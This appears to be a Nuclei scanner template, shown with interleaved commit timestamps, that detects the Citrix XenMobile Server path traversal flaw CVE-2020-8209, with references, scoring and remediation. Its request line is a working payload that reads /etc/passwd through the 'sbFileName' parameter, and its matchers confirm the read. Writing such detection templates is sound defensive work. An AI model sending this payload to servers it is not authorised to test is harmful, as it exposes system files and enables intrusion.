2021-01-02 04:56:15 +00:00
id : CVE-2020-8209
2020-11-16 14:49:51 +00:00
info :
2022-06-28 15:03:36 +00:00
name : Citrix XenMobile Server - Local File Inclusion
2020-11-16 14:49:51 +00:00
author : dwisiswant0
severity : high
description : |
2022-06-28 15:03:36 +00:00
Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities.
2021-08-18 11:29:20 +00:00
reference :
2020-11-16 14:49:51 +00:00
- https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
2022-05-17 09:18:12 +00:00
- https://support.citrix.com/article/CTX277457
2022-06-28 15:03:36 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-8209
2023-09-27 15:51:13 +00:00
impact : |
An attacker can access sensitive information stored on the server, potentially leading to further compromise or unauthorized access.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the latest security patches or updates provided by Citrix to fix the vulnerability.
2022-07-02 12:12:07 +00:00
reference :
- https://support.citrix.com/article/CTX277457
2024-03-23 09:28:19 +00:00
- https://github.com/Miraitowa70/POC-Notes
- https://github.com/dudek-marcin/Poc-Exp
- https://github.com/hectorgie/PoC-in-GitHub
- https://github.com/pen4uin/vulnerability-research
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-8209
cwe-id : CWE-22
2024-03-23 09:28:19 +00:00
epss-score : 0.96834
epss-percentile : 0.9967
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : citrix
product : xenmobile_server
2024-01-14 09:21:50 +00:00
tags : cve2020,cve,citrix,lfi,xenmobile
2020-11-16 14:49:51 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-11-16 14:49:51 +00:00
- method : GET
path :
- "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
2022-07-02 11:31:17 +00:00
2020-11-16 14:49:51 +00:00
matchers-condition : and
matchers :
- type : word
2022-07-02 11:31:17 +00:00
part : header
2020-11-16 14:49:51 +00:00
words :
- "fileDownload=true"
- "application/octet-stream"
- "attachment;"
condition : and
2023-07-11 19:49:27 +00:00
- type : regex
part : body
regex :
- "root:.*:0:0:"
2024-03-25 11:57:16 +00:00
# digest: 4a0a0047304502207857cb1944dd9e2083f4df982605d1dbcef6f8390d03106a23e982a29aed788f022100c410e96420e23c27071667a13d2d97f7f3f3676beb53a025e0ef3db9a599c5c0:922c64590222798bb761d5b6d8e72950